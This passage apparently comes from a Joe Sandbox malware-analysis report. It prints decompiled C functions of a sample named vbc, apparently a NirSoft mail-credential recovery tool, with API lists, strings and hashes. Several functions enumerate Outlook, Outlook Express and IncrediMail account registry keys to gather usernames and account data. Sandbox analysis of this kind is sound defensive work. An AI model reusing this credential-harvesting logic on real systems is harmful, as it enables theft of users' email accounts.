									 *0x4181ac =  *0x4181ac & 0x00000000;
									__eflags =  *0x4181ac;
									SetFocus( *(_t56 + 0x184));
								}
							} else {
								E00409EE8(_t56, _t92);
							}
						}
						return E00401939(_t103, _t100, _a8, _a12);
					}
					_t59 = _t51 - 1;
					__eflags = _t59;
					if(_t59 == 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)))) + 0x5c))();
						_t95 =  *((intOrPtr*)(__ecx + 0x370));
						_push(0);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)))) + 0x74))();
						E0040A5A1(__ecx);
						SetFocus( *( *((intOrPtr*)(__ecx + 0x370)) + 0x184));
						goto L22;
					}
					__eflags = _t59 == 6;
					if(_t59 == 6) {
						SetFocus( *(__ecx + 0x378));
					}
					goto L23;
				}
				if(_t104 == 0) {
					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
					E0040A5A1(__ecx);
					goto L22;
				}
				if(_t100 == 0x1c) {
					__eflags = _a8;
					if(_a8 == 0) {
						 *((intOrPtr*)(_t103 + 0x378)) = GetFocus();
					} else {
						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
					}
					goto L23;
				}
				if(_t100 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
						goto L23;
					}
					SetCursor(LoadCursorA( *0x417b94, 0x67));
					return 1;
				}
				if(_t100 == 0x2b) {
					_t93 = _a12;
					__eflags =  *((intOrPtr*)(_t93 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
					if( *((intOrPtr*)(_t93 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
						SetBkMode( *(_t93 + 0x18), 1);
						SetTextColor( *(_t93 + 0x18), 0xff0000);
						_v8 = SelectObject( *(_t93 + 0x18),  *(__ecx + 0x258));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t102 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExA( *(_t102 + 0x18), __ecx + 0x158, 0xffffffff, _t102 + 0x1c, 4,  &_v28);
						SelectObject( *(_t102 + 0x18), _v8);
						_t100 = _a4;
					}
				} else {
					if(_t100 == 0x7b) {
						_t99 = _a8;
						if(_a8 ==  *( *((intOrPtr*)(__ecx + 0x370)) + 0x184)) {
							E0040B48C(__ecx, _t99);
						}
					}
				}
				goto L23;
			}


















                                                                                                                                                                        0x0040b656
                                                                                                                                                                        0x0040b65f
                                                                                                                                                                        0x0040b667
                                                                                                                                                                        0x0040b669
                                                                                                                                                                        0x0040b66b
                                                                                                                                                                        0x0040b7a3
                                                                                                                                                                        0x0040b7a3
                                                                                                                                                                        0x0040b7a8
                                                                                                                                                                        0x0040b7f3
                                                                                                                                                                        0x0040b7f8
                                                                                                                                                                        0x0040b7f8
                                                                                                                                                                        0x0040b7fa
                                                                                                                                                                        0x0040b7ff
                                                                                                                                                                        0x0040b805
                                                                                                                                                                        0x0040b807
                                                                                                                                                                        0x0040b80a
                                                                                                                                                                        0x0040b810
                                                                                                                                                                        0x0040b816
                                                                                                                                                                        0x0040b81f
                                                                                                                                                                        0x0040b822
                                                                                                                                                                        0x0040b82a
                                                                                                                                                                        0x0040b82a
                                                                                                                                                                        0x0040b831
                                                                                                                                                                        0x0040b831
                                                                                                                                                                        0x0040b818
                                                                                                                                                                        0x0040b818
                                                                                                                                                                        0x0040b818
                                                                                                                                                                        0x0040b816
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b840
                                                                                                                                                                        0x0040b7aa
                                                                                                                                                                        0x0040b7aa
                                                                                                                                                                        0x0040b7ab
                                                                                                                                                                        0x0040b7c8
                                                                                                                                                                        0x0040b7cb
                                                                                                                                                                        0x0040b7d3
                                                                                                                                                                        0x0040b7d5
                                                                                                                                                                        0x0040b7d8
                                                                                                                                                                        0x0040b7e9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b7e9
                                                                                                                                                                        0x0040b7ad
                                                                                                                                                                        0x0040b7b0
                                                                                                                                                                        0x0040b7b8
                                                                                                                                                                        0x0040b7b8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b7b0
                                                                                                                                                                        0x0040b671
                                                                                                                                                                        0x0040b793
                                                                                                                                                                        0x0040b79a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b79a
                                                                                                                                                                        0x0040b67a
                                                                                                                                                                        0x0040b76b
                                                                                                                                                                        0x0040b76e
                                                                                                                                                                        0x0040b78b
                                                                                                                                                                        0x0040b770
                                                                                                                                                                        0x0040b77d
                                                                                                                                                                        0x0040b77d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b76e
                                                                                                                                                                        0x0040b683
                                                                                                                                                                        0x0040b740
                                                                                                                                                                        0x0040b746
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b75b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b763
                                                                                                                                                                        0x0040b68c
                                                                                                                                                                        0x0040b6b8
                                                                                                                                                                        0x0040b6be
                                                                                                                                                                        0x0040b6c4
                                                                                                                                                                        0x0040b6cf
                                                                                                                                                                        0x0040b6dd
                                                                                                                                                                        0x0040b6f4
                                                                                                                                                                        0x0040b6fc
                                                                                                                                                                        0x0040b6fd
                                                                                                                                                                        0x0040b6fe
                                                                                                                                                                        0x0040b6ff
                                                                                                                                                                        0x0040b700
                                                                                                                                                                        0x0040b719
                                                                                                                                                                        0x0040b720
                                                                                                                                                                        0x0040b727
                                                                                                                                                                        0x0040b733
                                                                                                                                                                        0x0040b735
                                                                                                                                                                        0x0040b735
                                                                                                                                                                        0x0040b68e
                                                                                                                                                                        0x0040b691
                                                                                                                                                                        0x0040b69d
                                                                                                                                                                        0x0040b6a6
                                                                                                                                                                        0x0040b6ae
                                                                                                                                                                        0x0040b6ae
                                                                                                                                                                        0x0040b6a6
                                                                                                                                                                        0x0040b691
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0040B6CF
                                                                                                                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 0040B6DD
                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 0040B6F2
                                                                                                                                                                        • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B727
                                                                                                                                                                        • SelectObject.GDI32(00000014,?), ref: 0040B733
                                                                                                                                                                          • Part of subcall function 0040B48C: GetCursorPos.USER32(?), ref: 0040B499
                                                                                                                                                                          • Part of subcall function 0040B48C: GetSubMenu.USER32 ref: 0040B4A7
                                                                                                                                                                          • Part of subcall function 0040B48C: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B4D4
                                                                                                                                                                        • LoadCursorA.USER32 ref: 0040B754
                                                                                                                                                                        • SetCursor.USER32(00000000), ref: 0040B75B
                                                                                                                                                                        • PostMessageA.USER32 ref: 0040B77D
                                                                                                                                                                        • SetFocus.USER32(?), ref: 0040B7B8
                                                                                                                                                                        • SetFocus.USER32(?), ref: 0040B831
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1416211542-0
                                                                                                                                                                        • Opcode ID: bc5cb01d3b7f9688ca8135e811a877c212f36fbd06482ddff94c06b945a20ebb
                                                                                                                                                                        • Instruction ID: bf574778d17b78baaeffb7f566a8ea64d240ccb0deb227a445330b453fade6b9
                                                                                                                                                                        • Opcode Fuzzy Hash: bc5cb01d3b7f9688ca8135e811a877c212f36fbd06482ddff94c06b945a20ebb
                                                                                                                                                                        • Instruction Fuzzy Hash: 4A519271100605EFCB15EF69CC88AEA7BA5FF44301F10443AF615AB2A1CB38AD51DB9D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00403E97 Relevance: 18.1, APIs: 7, Strings: 5, Instructions: 98stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                        			E00403E97(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t36;
				void* _t37;
				void* _t48;
				void* _t55;
				intOrPtr* _t56;
				signed int _t58;
				intOrPtr* _t63;
				void* _t70;
				void* _t71;

				_t56 = __ecx;
				E00412360(0x1048, __ecx);
				_t63 = _t56;
				_v8 = _t63;
				E00405F07(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t71 = _t70 + 0x2c;
				if( *0x418308 != 0) {
					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x418308);
					_t71 = _t71 + 0xc;
				}
				if( *0x418304 != 0) {
					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
				}
				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
				_t58 = 0x10;
				_push(_t36);
				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
				E00405F07(_a4,  &_v4172);
				_push(0x413450);
				_t55 = 6;
				_push(E00407A69(_t55));
				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_t48 = E00405F07(_a4,  &_v2124);
				_t78 = _a8 - 4;
				if(_a8 == 4) {
					return E00409959(_v8, _t78, _a4);
				}
				return _t48;
			}























                                                                                                                                                                        0x00403e97
                                                                                                                                                                        0x00403e9f
                                                                                                                                                                        0x00403eaf
                                                                                                                                                                        0x00403eb1
                                                                                                                                                                        0x00403eb4
                                                                                                                                                                        0x00403ec9
                                                                                                                                                                        0x00403ecf
                                                                                                                                                                        0x00403edd
                                                                                                                                                                        0x00403ee3
                                                                                                                                                                        0x00403ef1
                                                                                                                                                                        0x00403ef7
                                                                                                                                                                        0x00403efc
                                                                                                                                                                        0x00403f05
                                                                                                                                                                        0x00403f18
                                                                                                                                                                        0x00403f1d
                                                                                                                                                                        0x00403f1d
                                                                                                                                                                        0x00403f26
                                                                                                                                                                        0x00403f34
                                                                                                                                                                        0x00403f3a
                                                                                                                                                                        0x00403f3f
                                                                                                                                                                        0x00403f44
                                                                                                                                                                        0x00403f45
                                                                                                                                                                        0x00403f4e
                                                                                                                                                                        0x00403f6a
                                                                                                                                                                        0x00403f6b
                                                                                                                                                                        0x00403f7a
                                                                                                                                                                        0x00403f82
                                                                                                                                                                        0x00403f89
                                                                                                                                                                        0x00403f8f
                                                                                                                                                                        0x00403f9c
                                                                                                                                                                        0x00403fab
                                                                                                                                                                        0x00403fb3
                                                                                                                                                                        0x00403fb7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403fbf
                                                                                                                                                                        0x00403fc8

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                          • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,73B74DE0,00000000,?,?,00409460,00000001,00413B1C,73B74DE0), ref: 00405F21
                                                                                                                                                                        • memset.MSVCRT ref: 00403ECF
                                                                                                                                                                        • memset.MSVCRT ref: 00403EE3
                                                                                                                                                                        • memset.MSVCRT ref: 00403EF7
                                                                                                                                                                        • sprintf.MSVCRT ref: 00403F18
                                                                                                                                                                        • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F34
                                                                                                                                                                        • sprintf.MSVCRT ref: 00403F6B
                                                                                                                                                                        • sprintf.MSVCRT ref: 00403F9C
                                                                                                                                                                        Strings
                                                                                                                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA7
                                                                                                                                                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F46
                                                                                                                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F96
                                                                                                                                                                        • <table dir="rtl"><tr><td>, xrefs: 00403F2E
                                                                                                                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F12
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetsprintf$FileWritestrcpystrlen
                                                                                                                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                        • API String ID: 1043021993-1670831295
                                                                                                                                                                        • Opcode ID: 163ad70dd9f880e3028995f9713b9bd221414d9478fc282d95e5eed4acd236de
                                                                                                                                                                        • Instruction ID: 99203b830fad9dc7343b4b85adec4cad5e30f503418e1d4ebc977d79dce285bf
                                                                                                                                                                        • Opcode Fuzzy Hash: 163ad70dd9f880e3028995f9713b9bd221414d9478fc282d95e5eed4acd236de
                                                                                                                                                                        • Instruction Fuzzy Hash: F13166B2D00119AEDB54EB95DC41EDF7BACEB08304F1441ABB608E3141DA786FD48B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00402C1E Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00402C1E(void* __ecx, void* __fp0, intOrPtr _a4) {
				void* _v8;
				int _v12;
				char _v16;
				char _v20;
				void _v275;
				char _v276;
				void _v1299;
				char _v1300;
				void* __esi;
				void* _t35;
				intOrPtr _t36;
				void* _t40;
				void* _t52;
				void* _t58;
				void* _t60;
				void* _t64;
				char* _t66;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t83;

				_t83 = __fp0;
				_t64 = __ecx;
				_t35 = E0040F1B0(0x80000001, "Identities",  &_v8);
				_t74 = _t73 + 0xc;
				if(_t35 == 0) {
					_v12 = 0;
					_v276 = 0;
					memset( &_v275, 0, 0xff);
					_t40 = E0040F276(_v8, 0,  &_v276);
					_t75 = _t74 + 0x18;
					if(_t40 == 0) {
						_t66 = "%s\\%s";
						do {
							_t69 = _a4;
							E0040F232(_t64, _v8,  &_v276, "Username", _a4 + 0xa9c, 0x7f);
							_v1300 = 0;
							memset( &_v1299, 0, 0x3ff);
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Internet Account Manager\\Accounts");
							_t52 = E0040F1B0(_v8,  &_v1300,  &_v16);
							_t76 = _t75 + 0x3c;
							_t80 = _t52;
							if(_t52 == 0) {
								E00402B92(_t64,  &_v16, _t80, _t83, _t69, 1);
							}
							sprintf( &_v1300, _t66,  &_v276, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts");
							_t58 = E0040F1B0(_v8,  &_v1300,  &_v20);
							_t77 = _t76 + 0x1c;
							_t81 = _t58;
							if(_t58 == 0) {
								E00402B92(_t64,  &_v20, _t81, _t83, _a4, 5);
							}
							_v12 = _v12 + 1;
							_t60 = E0040F276(_v8, _v12,  &_v276);
							_t75 = _t77 + 0xc;
						} while (_t60 == 0);
					}
					RegCloseKey(_v8);
				}
				_t36 = _a4;
				 *((char*)(_t36 + 0xa9c)) = 0;
				return _t36;
			}


























                                                                                                                                                                        0x00402c1e
                                                                                                                                                                        0x00402c1e
                                                                                                                                                                        0x00402c36
                                                                                                                                                                        0x00402c3b
                                                                                                                                                                        0x00402c42
                                                                                                                                                                        0x00402c55
                                                                                                                                                                        0x00402c58
                                                                                                                                                                        0x00402c5e
                                                                                                                                                                        0x00402c6e
                                                                                                                                                                        0x00402c73
                                                                                                                                                                        0x00402c78
                                                                                                                                                                        0x00402c80
                                                                                                                                                                        0x00402c85
                                                                                                                                                                        0x00402c85
                                                                                                                                                                        0x00402ca0
                                                                                                                                                                        0x00402cb2
                                                                                                                                                                        0x00402cb8
                                                                                                                                                                        0x00402cd1
                                                                                                                                                                        0x00402ce4
                                                                                                                                                                        0x00402ce9
                                                                                                                                                                        0x00402cec
                                                                                                                                                                        0x00402cee
                                                                                                                                                                        0x00402cf6
                                                                                                                                                                        0x00402cf6
                                                                                                                                                                        0x00402d0f
                                                                                                                                                                        0x00402d22
                                                                                                                                                                        0x00402d27
                                                                                                                                                                        0x00402d2a
                                                                                                                                                                        0x00402d2c
                                                                                                                                                                        0x00402d36
                                                                                                                                                                        0x00402d36
                                                                                                                                                                        0x00402d3b
                                                                                                                                                                        0x00402d4b
                                                                                                                                                                        0x00402d50
                                                                                                                                                                        0x00402d53
                                                                                                                                                                        0x00402d5c
                                                                                                                                                                        0x00402d60
                                                                                                                                                                        0x00402d60
                                                                                                                                                                        0x00402d66
                                                                                                                                                                        0x00402d69
                                                                                                                                                                        0x00402d71

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                        • memset.MSVCRT ref: 00402C5E
                                                                                                                                                                          • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402D60
                                                                                                                                                                          • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                                                                                                                                                                        • memset.MSVCRT ref: 00402CB8
                                                                                                                                                                        • sprintf.MSVCRT ref: 00402CD1
                                                                                                                                                                        • sprintf.MSVCRT ref: 00402D0F
                                                                                                                                                                          • Part of subcall function 00402B92: memset.MSVCRT ref: 00402BB2
                                                                                                                                                                          • Part of subcall function 00402B92: RegCloseKey.ADVAPI32 ref: 00402C16
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                        • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                        • API String ID: 1831126014-3814494228
                                                                                                                                                                        • Opcode ID: aa5e6b6edcfc89fa36e6c73b68bb675aec0b52e4a9a4f07f5dc5d81ecae78039
                                                                                                                                                                        • Instruction ID: 6132c75c80fc905e8fcbbac6237d45e27d646b3e48d82405447337ab985425ff
                                                                                                                                                                        • Opcode Fuzzy Hash: aa5e6b6edcfc89fa36e6c73b68bb675aec0b52e4a9a4f07f5dc5d81ecae78039
                                                                                                                                                                        • Instruction Fuzzy Hash: 66314072D0011DBADB21EA91CD42EEF7B7CAF18345F0404BABA14F2091E7B49F888B54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00405FD0 Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00405FD0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t14;
				void* _t29;
				void* _t34;
				long _t36;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t14 = E00405ED5(_a4);
				_v12 = _t14;
				if(_t14 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t36 = GetFileSize(_t14, 0);
					_t5 = _t36 + 1; // 0x1
					_t29 = GlobalAlloc(0x2000, _t5);
					if(_t29 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						_t34 = GlobalLock(_t29);
						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *((char*)(_t34 + _t36)) = 0;
							GlobalUnlock(_t29);
							SetClipboardData(1, _t29);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}










                                                                                                                                                                        0x00405fd6
                                                                                                                                                                        0x00405fda
                                                                                                                                                                        0x00405fe3
                                                                                                                                                                        0x00405fec
                                                                                                                                                                        0x00405fef
                                                                                                                                                                        0x00406065
                                                                                                                                                                        0x00405ff1
                                                                                                                                                                        0x00405ffd
                                                                                                                                                                        0x00405fff
                                                                                                                                                                        0x0040600e
                                                                                                                                                                        0x00406012
                                                                                                                                                                        0x00406048
                                                                                                                                                                        0x0040604e
                                                                                                                                                                        0x00406014
                                                                                                                                                                        0x0040601d
                                                                                                                                                                        0x00406030
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00406032
                                                                                                                                                                        0x00406033
                                                                                                                                                                        0x00406037
                                                                                                                                                                        0x00406040
                                                                                                                                                                        0x00406040
                                                                                                                                                                        0x00406030
                                                                                                                                                                        0x00406054
                                                                                                                                                                        0x0040605c
                                                                                                                                                                        0x00406068
                                                                                                                                                                        0x00406072

                                                                                                                                                                        APIs
                                                                                                                                                                        • EmptyClipboard.USER32 ref: 00405FDA
                                                                                                                                                                          • Part of subcall function 00405ED5: CreateFileA.KERNEL32(0041133F,80000000,00000001,00000000,00000003,00000000,00000000,0041127B,0041141B,?,0041133F,?,?,*.oeaccount,0041141B,?), ref: 00405EE7
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00405FF7
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406008
                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00406015
                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406028
                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00406037
                                                                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 00406040
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00406048
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406054
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0040605F
                                                                                                                                                                        • CloseClipboard.USER32 ref: 00406068
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3604893535-0
                                                                                                                                                                        • Opcode ID: 5d04c3275f228edfc2a9dcea81e5f6d2cb0bf8e7915dc2d704a3e214ce43d208
                                                                                                                                                                        • Instruction ID: 46ab690def339a2f00972c0b4152e32a3d13c207705114ffa6be22e44c23a91c
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d04c3275f228edfc2a9dcea81e5f6d2cb0bf8e7915dc2d704a3e214ce43d208
                                                                                                                                                                        • Instruction Fuzzy Hash: A0112875544205BFDB10AFA4AC48B9A7FB8EB08316F118176F906E22A1DB748A44CA69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F44C Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • strcpy.MSVCRT(?,Common Programs,0040F56A,?,?,?,?,?,00000104), ref: 0040F4BF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy
                                                                                                                                                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                        • API String ID: 3177657795-318151290
                                                                                                                                                                        • Opcode ID: 46c502567c8f6af6d591b013d3d66ac45f3f8eb4ada5af74b17da760bd137375
                                                                                                                                                                        • Instruction ID: 3fcc29bccd1c625ad2997487a879199120d1d943b4c0761a6650e27991626466
                                                                                                                                                                        • Opcode Fuzzy Hash: 46c502567c8f6af6d591b013d3d66ac45f3f8eb4ada5af74b17da760bd137375
                                                                                                                                                                        • Instruction Fuzzy Hash: B9F01D732BEE0A60D43405681F06EF70402A0F17553BA86336D42F5ED6E9BC888E60AF
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00402F9C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00402F9C(void* __eax, void* __ecx, void* __fp0, void* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				void _v271;
				char _v272;
				void _v527;
				char _v528;
				void _v827;
				char _v828;
				void* __edi;
				void* __esi;
				long _t40;
				void* _t44;
				void* _t55;
				void* _t60;
				void* _t66;
				void* _t67;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t77;

				_t77 = __fp0;
				_t66 = __ecx;
				_t67 = __eax;
				_t40 = E0040F1B0(_a4, "Software\\IncrediMail\\Identities",  &_a4);
				_t72 = _t71 + 0xc;
				if(_t40 == 0) {
					_v12 = 0;
					_v272 = 0;
					memset( &_v271, 0, 0xff);
					_t44 = E0040F276(_a4, 0,  &_v272);
					_t73 = _t72 + 0x18;
					while(_t44 == 0) {
						E0040F232(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
						_v828 = 0;
						memset( &_v827, 0, 0x12b);
						sprintf( &_v828, "%s\\Accounts",  &_v272);
						_t55 = E0040F1B0(_a4,  &_v828,  &_v8);
						_t74 = _t73 + 0x38;
						if(_t55 == 0) {
							_v16 = 0;
							_v528 = 0;
							memset( &_v527, 0, 0xff);
							_t60 = E0040F276(_v8, 0,  &_v528);
							_t74 = _t74 + 0x18;
							while(_t60 == 0) {
								E00402D74(_t66, _t67, 0xff, _t77, _v8,  &_v528);
								_v16 = _v16 + 1;
								_t60 = E0040F276(_v8, _v16,  &_v528);
								_t74 = _t74 + 0xc;
							}
							RegCloseKey(_v8);
						}
						_v12 = _v12 + 1;
						_t44 = E0040F276(_a4, _v12,  &_v272);
						_t73 = _t74 + 0xc;
					}
					_t40 = RegCloseKey(_a4);
				}
				 *((char*)(_t67 + 0xa9c)) = 0;
				return _t40;
			}

























                                                                                                                                                                        0x00402f9c
                                                                                                                                                                        0x00402f9c
                                                                                                                                                                        0x00402fa7
                                                                                                                                                                        0x00402fb5
                                                                                                                                                                        0x00402fba
                                                                                                                                                                        0x00402fc1
                                                                                                                                                                        0x00402fd6
                                                                                                                                                                        0x00402fd9
                                                                                                                                                                        0x00402fdf
                                                                                                                                                                        0x00402fef
                                                                                                                                                                        0x00402ff4
                                                                                                                                                                        0x004030db
                                                                                                                                                                        0x00403014
                                                                                                                                                                        0x00403026
                                                                                                                                                                        0x0040302c
